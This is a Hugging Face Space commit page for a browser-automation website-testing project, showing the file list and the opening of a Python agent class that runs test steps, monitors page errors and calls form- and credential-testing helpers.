Spaces:
Running
Running
Upload folder using huggingface_hub
Browse files- src/__init__.py +0 -0
- src/agent/__init__.py +0 -0
- src/agent/browser_use/browser_use_agent.py +786 -0
- src/agent/deep_research/deep_research_agent.py +1276 -0
- src/browser/__init__.py +0 -0
- src/browser/custom_browser.py +120 -0
- src/browser/custom_context.py +33 -0
- src/controller/__init__.py +0 -0
- src/controller/custom_controller.py +193 -0
- src/utils/__init__.py +0 -0
- src/utils/advanced_error_handler.py +450 -0
- src/utils/advanced_testing.py +1015 -0
- src/utils/ai_thinking_engine.py +437 -0
- src/utils/config.py +111 -0
- src/utils/credential_manager.py +628 -0
- src/utils/enhanced_ai_testing.py +635 -0
- src/utils/error_monitor.py +615 -0
- src/utils/html_report_generator.py +212 -0
- src/utils/intelligent_form_testing.py +1096 -0
- src/utils/llm_provider.py +366 -0
- src/utils/mcp_client.py +254 -0
- src/utils/pdf_report_generator.py +736 -0
- src/utils/screenshot_capture.py +287 -0
- src/utils/site_audit.py +144 -0
- src/utils/utils.py +50 -0
- src/webui/__init__.py +0 -0
- src/webui/components/__init__.py +0 -0
- src/webui/components/agent_settings_tab.py +241 -0
- src/webui/components/browser_settings_tab.py +181 -0
- src/webui/components/browser_use_agent_tab.py +1299 -0
- src/webui/components/deep_research_agent_tab.py +457 -0
- src/webui/interface.py +179 -0
- src/webui/webui_manager.py +146 -0
src/__init__.py
ADDED
|
File without changes
|
src/agent/__init__.py
ADDED
|
File without changes
|
src/agent/browser_use/browser_use_agent.py
ADDED
|
@@ -0,0 +1,786 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Browser Use Agent
|
| 3 |
+
=============================================================
|
| 4 |
+
|
| 5 |
+
Advanced browser automation agent for comprehensive website testing.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
from __future__ import annotations
|
| 13 |
+
|
| 14 |
+
import asyncio
|
| 15 |
+
import logging
|
| 16 |
+
import os
|
| 17 |
+
|
| 18 |
+
# Disable telemetry
|
| 19 |
+
os.environ["BROWSER_USE_TELEMETRY"] = "false"
|
| 20 |
+
os.environ["BROWSER_USE_DISABLE_TELEMETRY"] = "true"
|
| 21 |
+
|
| 22 |
+
# from lmnr.sdk.decorators import observe
|
| 23 |
+
from browser_use.agent.gif import create_history_gif
|
| 24 |
+
from browser_use.agent.service import Agent, AgentHookFunc
|
| 25 |
+
from browser_use.agent.views import (
|
| 26 |
+
ActionResult,
|
| 27 |
+
AgentHistory,
|
| 28 |
+
AgentHistoryList,
|
| 29 |
+
AgentStepInfo,
|
| 30 |
+
ToolCallingMethod,
|
| 31 |
+
)
|
| 32 |
+
from browser_use.browser.views import BrowserStateHistory
|
| 33 |
+
from browser_use.utils import time_execution_async
|
| 34 |
+
from dotenv import load_dotenv
|
| 35 |
+
from browser_use.agent.message_manager.utils import is_model_without_tool_support
|
| 36 |
+
from src.utils.screenshot_capture import screenshot_capture
|
| 37 |
+
from src.utils.advanced_testing import advanced_testing_engine
|
| 38 |
+
from src.utils.enhanced_ai_testing import enhanced_ai_testing_engine
|
| 39 |
+
from src.utils.error_monitor import error_monitor
|
| 40 |
+
from src.utils.intelligent_form_testing import IntelligentFormTester
|
| 41 |
+
from src.utils.ai_thinking_engine import AIThinkingEngine
|
| 42 |
+
from src.utils.credential_manager import CredentialManager
|
| 43 |
+
from datetime import datetime
|
| 44 |
+
import json
|
| 45 |
+
|
| 46 |
+
load_dotenv()
|
| 47 |
+
logger = logging.getLogger(__name__)
|
| 48 |
+
|
| 49 |
+
SKIP_LLM_API_KEY_VERIFICATION = (
|
| 50 |
+
os.environ.get("SKIP_LLM_API_KEY_VERIFICATION", "false").lower()[0] in "ty1"
|
| 51 |
+
)
|
| 52 |
+
|
| 53 |
+
|
| 54 |
+
class BrowserUseAgent(Agent):
|
| 55 |
+
def __init__(self, *args, **kwargs):
|
| 56 |
+
super().__init__(*args, **kwargs)
|
| 57 |
+
# Initialize error monitor
|
| 58 |
+
self.error_monitor = error_monitor
|
| 59 |
+
# Initialize enhanced AI testing engine
|
| 60 |
+
self.enhanced_ai_testing_engine = enhanced_ai_testing_engine
|
| 61 |
+
# Initialize intelligent testing components
|
| 62 |
+
self.intelligent_form_tester = None
|
| 63 |
+
self.ai_thinking_engine = None
|
| 64 |
+
self.credential_manager = None
|
| 65 |
+
self.intelligent_testing_enabled = True
|
| 66 |
+
|
| 67 |
+
def _set_tool_calling_method(self) -> ToolCallingMethod | None:
|
| 68 |
+
tool_calling_method = self.settings.tool_calling_method
|
| 69 |
+
if tool_calling_method == 'auto':
|
| 70 |
+
if is_model_without_tool_support(self.model_name):
|
| 71 |
+
return 'raw'
|
| 72 |
+
elif self.chat_model_library == 'ChatGoogleGenerativeAI':
|
| 73 |
+
return None
|
| 74 |
+
elif self.chat_model_library == 'ChatOpenAI':
|
| 75 |
+
return 'function_calling'
|
| 76 |
+
elif self.chat_model_library == 'AzureChatOpenAI':
|
| 77 |
+
return 'function_calling'
|
| 78 |
+
else:
|
| 79 |
+
return None
|
| 80 |
+
else:
|
| 81 |
+
return tool_calling_method
|
| 82 |
+
|
| 83 |
+
@time_execution_async("--run (agent)")
|
| 84 |
+
async def run(
|
| 85 |
+
self, max_steps: int = 100, on_step_start: AgentHookFunc | None = None,
|
| 86 |
+
on_step_end: AgentHookFunc | None = None
|
| 87 |
+
) -> AgentHistoryList:
|
| 88 |
+
"""Execute the task with maximum number of steps"""
|
| 89 |
+
|
| 90 |
+
loop = asyncio.get_event_loop()
|
| 91 |
+
|
| 92 |
+
# Set up the Ctrl+C signal handler with callbacks specific to this agent
|
| 93 |
+
from browser_use.utils import SignalHandler
|
| 94 |
+
|
| 95 |
+
signal_handler = SignalHandler(
|
| 96 |
+
loop=loop,
|
| 97 |
+
pause_callback=self.pause,
|
| 98 |
+
resume_callback=self.resume,
|
| 99 |
+
custom_exit_callback=None, # No special cleanup needed on forced exit
|
| 100 |
+
exit_on_second_int=True,
|
| 101 |
+
)
|
| 102 |
+
signal_handler.register()
|
| 103 |
+
|
| 104 |
+
try:
|
| 105 |
+
self._log_agent_run()
|
| 106 |
+
|
| 107 |
+
# Start error monitoring
|
| 108 |
+
if hasattr(self, 'browser_context') and self.browser_context:
|
| 109 |
+
try:
|
| 110 |
+
# Use the correct method to get a page from browser context
|
| 111 |
+
if hasattr(self.browser_context, 'new_page'):
|
| 112 |
+
page = await self.browser_context.new_page()
|
| 113 |
+
elif hasattr(self.browser_context, 'pages') and self.browser_context.pages:
|
| 114 |
+
page = self.browser_context.pages[0]
|
| 115 |
+
else:
|
| 116 |
+
# Try to get page from browser state
|
| 117 |
+
if hasattr(self.state, 'browser_state') and self.state.browser_state:
|
| 118 |
+
page = self.state.browser_state.current_page
|
| 119 |
+
else:
|
| 120 |
+
page = None
|
| 121 |
+
|
| 122 |
+
if page:
|
| 123 |
+
await self.error_monitor.start_monitoring(page)
|
| 124 |
+
logger.info("🔍 Error monitoring started")
|
| 125 |
+
else:
|
| 126 |
+
logger.warning("Could not get page for error monitoring")
|
| 127 |
+
except Exception as e:
|
| 128 |
+
logger.warning(f"Failed to start error monitoring: {e}")
|
| 129 |
+
|
| 130 |
+
# Execute initial actions if provided
|
| 131 |
+
if self.initial_actions:
|
| 132 |
+
result = await self.multi_act(self.initial_actions, check_for_new_elements=False)
|
| 133 |
+
self.state.last_result = result
|
| 134 |
+
|
| 135 |
+
for step in range(max_steps):
|
| 136 |
+
# Check if waiting for user input after Ctrl+C
|
| 137 |
+
if self.state.paused:
|
| 138 |
+
signal_handler.wait_for_resume()
|
| 139 |
+
signal_handler.reset()
|
| 140 |
+
|
| 141 |
+
# Check if we should stop due to too many failures
|
| 142 |
+
if self.state.consecutive_failures >= self.settings.max_failures:
|
| 143 |
+
logger.error(f'❌ Stopping due to {self.settings.max_failures} consecutive failures')
|
| 144 |
+
break
|
| 145 |
+
|
| 146 |
+
# Check control flags before each step
|
| 147 |
+
if self.state.stopped:
|
| 148 |
+
logger.info('Agent stopped')
|
| 149 |
+
break
|
| 150 |
+
|
| 151 |
+
while self.state.paused:
|
| 152 |
+
await asyncio.sleep(0.2) # Small delay to prevent CPU spinning
|
| 153 |
+
if self.state.stopped: # Allow stopping while paused
|
| 154 |
+
break
|
| 155 |
+
|
| 156 |
+
if on_step_start is not None:
|
| 157 |
+
await on_step_start(self)
|
| 158 |
+
|
| 159 |
+
step_info = AgentStepInfo(step_number=step, max_steps=max_steps)
|
| 160 |
+
await self.step(step_info)
|
| 161 |
+
|
| 162 |
+
if on_step_end is not None:
|
| 163 |
+
await on_step_end(self)
|
| 164 |
+
|
| 165 |
+
if self.state.history.is_done():
|
| 166 |
+
if self.settings.validate_output and step < max_steps - 1:
|
| 167 |
+
if not await self._validate_output():
|
| 168 |
+
continue
|
| 169 |
+
|
| 170 |
+
await self.log_completion()
|
| 171 |
+
break
|
| 172 |
+
else:
|
| 173 |
+
error_message = 'Failed to complete task in maximum steps'
|
| 174 |
+
|
| 175 |
+
self.state.history.history.append(
|
| 176 |
+
AgentHistory(
|
| 177 |
+
model_output=None,
|
| 178 |
+
result=[ActionResult(error=error_message, include_in_memory=True)],
|
| 179 |
+
state=BrowserStateHistory(
|
| 180 |
+
url='',
|
| 181 |
+
title='',
|
| 182 |
+
tabs=[],
|
| 183 |
+
interacted_element=[],
|
| 184 |
+
screenshot=None,
|
| 185 |
+
),
|
| 186 |
+
metadata=None,
|
| 187 |
+
)
|
| 188 |
+
)
|
| 189 |
+
|
| 190 |
+
logger.info(f'❌ {error_message}')
|
| 191 |
+
|
| 192 |
+
return self.state.history
|
| 193 |
+
|
| 194 |
+
except KeyboardInterrupt:
|
| 195 |
+
# Already handled by our signal handler, but catch any direct KeyboardInterrupt as well
|
| 196 |
+
logger.info('Got KeyboardInterrupt during execution, returning current history')
|
| 197 |
+
return self.state.history
|
| 198 |
+
|
| 199 |
+
finally:
|
| 200 |
+
# Unregister signal handlers before cleanup
|
| 201 |
+
signal_handler.unregister()
|
| 202 |
+
|
| 203 |
+
if self.settings.save_playwright_script_path:
|
| 204 |
+
logger.info(
|
| 205 |
+
f'Agent run finished. Attempting to save Playwright script to: {self.settings.save_playwright_script_path}'
|
| 206 |
+
)
|
| 207 |
+
try:
|
| 208 |
+
# Extract sensitive data keys if sensitive_data is provided
|
| 209 |
+
keys = list(self.sensitive_data.keys()) if self.sensitive_data else None
|
| 210 |
+
# Pass browser and context config to the saving method
|
| 211 |
+
self.state.history.save_as_playwright_script(
|
| 212 |
+
self.settings.save_playwright_script_path,
|
| 213 |
+
sensitive_data_keys=keys,
|
| 214 |
+
browser_config=self.browser.config,
|
| 215 |
+
context_config=self.browser_context.config,
|
| 216 |
+
)
|
| 217 |
+
except Exception as script_gen_err:
|
| 218 |
+
# Log any error during script generation/saving
|
| 219 |
+
logger.error(f'Failed to save Playwright script: {script_gen_err}', exc_info=True)
|
| 220 |
+
|
| 221 |
+
await self.close()
|
| 222 |
+
|
| 223 |
+
if self.settings.generate_gif:
|
| 224 |
+
output_path: str = 'agent_history.gif'
|
| 225 |
+
if isinstance(self.settings.generate_gif, str):
|
| 226 |
+
output_path = self.settings.generate_gif
|
| 227 |
+
|
| 228 |
+
create_history_gif(task=self.task, history=self.state.history, output_path=output_path)
|
| 229 |
+
|
| 230 |
+
# PDF report generation disabled per project settings
|
| 231 |
+
await self._generate_automated_pdf_report()
|
| 232 |
+
|
| 233 |
+
# Stop error monitoring
|
| 234 |
+
try:
|
| 235 |
+
if hasattr(self, 'error_monitor') and self.error_monitor:
|
| 236 |
+
await self.error_monitor.stop_monitoring()
|
| 237 |
+
logger.info("🛑 Error monitoring stopped")
|
| 238 |
+
except Exception as e:
|
| 239 |
+
logger.warning(f"Failed to stop error monitoring: {e}")
|
| 240 |
+
|
| 241 |
+
async def initialize_intelligent_testing(self):
|
| 242 |
+
"""Initialize intelligent testing components."""
|
| 243 |
+
try:
|
| 244 |
+
if not self.intelligent_testing_enabled:
|
| 245 |
+
return
|
| 246 |
+
|
| 247 |
+
logger.info("🧠 Initializing intelligent testing components...")
|
| 248 |
+
|
| 249 |
+
# Initialize AI thinking engine
|
| 250 |
+
self.ai_thinking_engine = AIThinkingEngine(
|
| 251 |
+
llm=self.chat_model,
|
| 252 |
+
page=self.browser_context.page
|
| 253 |
+
)
|
| 254 |
+
|
| 255 |
+
# Initialize intelligent form tester
|
| 256 |
+
self.intelligent_form_tester = IntelligentFormTester(
|
| 257 |
+
llm=self.chat_model,
|
| 258 |
+
page=self.browser_context.page
|
| 259 |
+
)
|
| 260 |
+
|
| 261 |
+
# Initialize credential manager
|
| 262 |
+
self.credential_manager = CredentialManager(
|
| 263 |
+
page=self.browser_context.page
|
| 264 |
+
)
|
| 265 |
+
|
| 266 |
+
logger.info("✅ Intelligent testing components initialized")
|
| 267 |
+
|
| 268 |
+
except Exception as e:
|
| 269 |
+
logger.error(f"❌ Error initializing intelligent testing: {e}")
|
| 270 |
+
self.intelligent_testing_enabled = False
|
| 271 |
+
|
| 272 |
+
async def run_intelligent_form_testing(self) -> Dict[str, Any]:
|
| 273 |
+
"""Run intelligent form testing with comprehensive scenarios."""
|
| 274 |
+
try:
|
| 275 |
+
if not self.intelligent_testing_enabled or not self.intelligent_form_tester:
|
| 276 |
+
logger.warning("⚠️ Intelligent form testing not available")
|
| 277 |
+
return {"error": "Intelligent form testing not available"}
|
| 278 |
+
|
| 279 |
+
logger.info("🚀 Starting intelligent form testing...")
|
| 280 |
+
|
| 281 |
+
# Discover form fields
|
| 282 |
+
form_fields = await self.intelligent_form_tester.discover_form_fields()
|
| 283 |
+
|
| 284 |
+
if not form_fields:
|
| 285 |
+
logger.warning("⚠️ No form fields found on the page")
|
| 286 |
+
return {"error": "No form fields found"}
|
| 287 |
+
|
| 288 |
+
# Generate test scenarios
|
| 289 |
+
test_scenarios = await self.intelligent_form_tester.generate_test_scenarios()
|
| 290 |
+
|
| 291 |
+
# Execute test scenarios
|
| 292 |
+
test_results = await self.intelligent_form_tester.execute_test_scenarios(test_scenarios)
|
| 293 |
+
|
| 294 |
+
# Generate comprehensive report
|
| 295 |
+
report = await self.intelligent_form_tester.generate_comprehensive_report()
|
| 296 |
+
|
| 297 |
+
# Add detailed error report
|
| 298 |
+
error_report = self.intelligent_form_tester.get_detailed_error_report()
|
| 299 |
+
report["detailed_error_analysis"] = error_report
|
| 300 |
+
|
| 301 |
+
logger.info(f"✅ Intelligent form testing complete: {len(test_results)} tests executed")
|
| 302 |
+
return report
|
| 303 |
+
|
| 304 |
+
except Exception as e:
|
| 305 |
+
logger.error(f"❌ Error in intelligent form testing: {e}")
|
| 306 |
+
return {"error": str(e)}
|
| 307 |
+
|
| 308 |
+
async def run_intelligent_credential_testing(self) -> Dict[str, Any]:
|
| 309 |
+
"""Run intelligent credential testing with various scenarios."""
|
| 310 |
+
try:
|
| 311 |
+
if not self.intelligent_testing_enabled or not self.credential_manager:
|
| 312 |
+
logger.warning("⚠️ Intelligent credential testing not available")
|
| 313 |
+
return {"error": "Intelligent credential testing not available"}
|
| 314 |
+
|
| 315 |
+
logger.info("🔐 Starting intelligent credential testing...")
|
| 316 |
+
|
| 317 |
+
# Run comprehensive credential testing
|
| 318 |
+
report = await self.credential_manager.run_comprehensive_credential_testing()
|
| 319 |
+
|
| 320 |
+
logger.info("✅ Intelligent credential testing complete")
|
| 321 |
+
return report
|
| 322 |
+
|
| 323 |
+
except Exception as e:
|
| 324 |
+
logger.error(f"❌ Error in intelligent credential testing: {e}")
|
| 325 |
+
return {"error": str(e)}
|
| 326 |
+
|
| 327 |
+
async def run_ai_thinking_analysis(self) -> Dict[str, Any]:
|
| 328 |
+
"""Run AI thinking analysis of the current page."""
|
| 329 |
+
try:
|
| 330 |
+
if not self.intelligent_testing_enabled or not self.ai_thinking_engine:
|
| 331 |
+
logger.warning("⚠️ AI thinking analysis not available")
|
| 332 |
+
return {"error": "AI thinking analysis not available"}
|
| 333 |
+
|
| 334 |
+
logger.info("🤔 Starting AI thinking analysis...")
|
| 335 |
+
|
| 336 |
+
# Analyze the page intelligently
|
| 337 |
+
page_analysis = await self.ai_thinking_engine.analyze_page_intelligence()
|
| 338 |
+
|
| 339 |
+
# Generate testing strategy
|
| 340 |
+
testing_strategy = await self.ai_thinking_engine.generate_testing_strategy(page_analysis)
|
| 341 |
+
|
| 342 |
+
# Get thinking summary
|
| 343 |
+
thinking_summary = self.ai_thinking_engine.get_thinking_summary()
|
| 344 |
+
|
| 345 |
+
analysis_result = {
|
| 346 |
+
"page_analysis": page_analysis,
|
| 347 |
+
"testing_strategy": {
|
| 348 |
+
"approach": testing_strategy.approach,
|
| 349 |
+
"priority_order": testing_strategy.priority_order,
|
| 350 |
+
"focus_areas": testing_strategy.focus_areas,
|
| 351 |
+
"risk_assessment": testing_strategy.risk_assessment,
|
| 352 |
+
"estimated_duration": testing_strategy.estimated_duration,
|
| 353 |
+
"reasoning": testing_strategy.reasoning
|
| 354 |
+
},
|
| 355 |
+
"thinking_summary": thinking_summary
|
| 356 |
+
}
|
| 357 |
+
|
| 358 |
+
logger.info("✅ AI thinking analysis complete")
|
| 359 |
+
return analysis_result
|
| 360 |
+
|
| 361 |
+
except Exception as e:
|
| 362 |
+
logger.error(f"❌ Error in AI thinking analysis: {e}")
|
| 363 |
+
return {"error": str(e)}
|
| 364 |
+
|
| 365 |
+
async def run_comprehensive_intelligent_testing(self) -> Dict[str, Any]:
|
| 366 |
+
"""Run comprehensive intelligent testing combining all features."""
|
| 367 |
+
try:
|
| 368 |
+
if not self.intelligent_testing_enabled:
|
| 369 |
+
logger.warning("⚠️ Intelligent testing not enabled")
|
| 370 |
+
return {"error": "Intelligent testing not enabled"}
|
| 371 |
+
|
| 372 |
+
logger.info("🎯 Starting comprehensive intelligent testing...")
|
| 373 |
+
|
| 374 |
+
# Initialize intelligent testing components
|
| 375 |
+
await self.initialize_intelligent_testing()
|
| 376 |
+
|
| 377 |
+
# Run AI thinking analysis
|
| 378 |
+
ai_analysis = await self.run_ai_thinking_analysis()
|
| 379 |
+
|
| 380 |
+
# Run intelligent form testing
|
| 381 |
+
form_testing = await self.run_intelligent_form_testing()
|
| 382 |
+
|
| 383 |
+
# Run intelligent credential testing
|
| 384 |
+
credential_testing = await self.run_intelligent_credential_testing()
|
| 385 |
+
|
| 386 |
+
# Combine all results
|
| 387 |
+
comprehensive_result = {
|
| 388 |
+
"ai_analysis": ai_analysis,
|
| 389 |
+
"form_testing": form_testing,
|
| 390 |
+
"credential_testing": credential_testing,
|
| 391 |
+
"timestamp": datetime.now().isoformat(),
|
| 392 |
+
"summary": {
|
| 393 |
+
"ai_analysis_success": "error" not in ai_analysis,
|
| 394 |
+
"form_testing_success": "error" not in form_testing,
|
| 395 |
+
"credential_testing_success": "error" not in credential_testing
|
| 396 |
+
}
|
| 397 |
+
}
|
| 398 |
+
|
| 399 |
+
logger.info("✅ Comprehensive intelligent testing complete")
|
| 400 |
+
return comprehensive_result
|
| 401 |
+
|
| 402 |
+
except Exception as e:
|
| 403 |
+
logger.error(f"❌ Error in comprehensive intelligent testing: {e}")
|
| 404 |
+
return {"error": str(e)}
|
| 405 |
+
|
| 406 |
+
async def _generate_automated_pdf_report(self):
|
| 407 |
+
"""PDF report generation disabled."""
|
| 408 |
+
logger.info("📊 PDF report generation is disabled. Skipping.")
|
| 409 |
+
|
| 410 |
+
async def _prepare_test_data_for_report(self):
|
| 411 |
+
"""Prepare test data from execution history for PDF report."""
|
| 412 |
+
try:
|
| 413 |
+
logger.info("🔍 Starting test data preparation...")
|
| 414 |
+
|
| 415 |
+
# Debug: Log the history structure
|
| 416 |
+
logger.info(f"History type: {type(self.state.history)}")
|
| 417 |
+
|
| 418 |
+
# Check if state exists
|
| 419 |
+
if not hasattr(self, 'state') or not self.state:
|
| 420 |
+
logger.error("❌ No state found in agent")
|
| 421 |
+
raise Exception("No state found in agent")
|
| 422 |
+
|
| 423 |
+
# Check if history exists
|
| 424 |
+
if not hasattr(self.state, 'history') or not self.state.history:
|
| 425 |
+
logger.error("❌ No history found in state")
|
| 426 |
+
raise Exception("No history found in state")
|
| 427 |
+
|
